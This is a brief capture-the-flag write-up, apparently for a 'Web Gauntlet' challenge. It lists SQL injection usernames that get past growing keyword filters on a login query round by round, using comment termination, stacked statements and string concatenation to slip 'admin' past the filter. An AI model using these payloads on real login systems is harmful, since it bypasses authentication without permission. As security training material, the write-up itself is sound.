Web Gauntlet¶
Query executed:
SELECT * FROM users WHERE username='<Username>' AND password='<Password>'
Round 1¶
Filter: or \
Submit username: admin';--
Round 2¶
Filter: or and like = --\
Submit username: admin'; SELECT * FROM users WHERE '1
Round 3¶
Filter: or and like = < > --\
The previous solution should work, but isn't. Checking response in Networks tab of filter.php shows us the actual one \
Filter: <space> or and like = < > --\
Submit username: admin';'1
Round 4¶
Filter: <space> or and like = < > -- admin\
Submit username: admi'||'n';'1
Round 5¶
Filter: <space> or and like = < > -- union admin\
Previous one works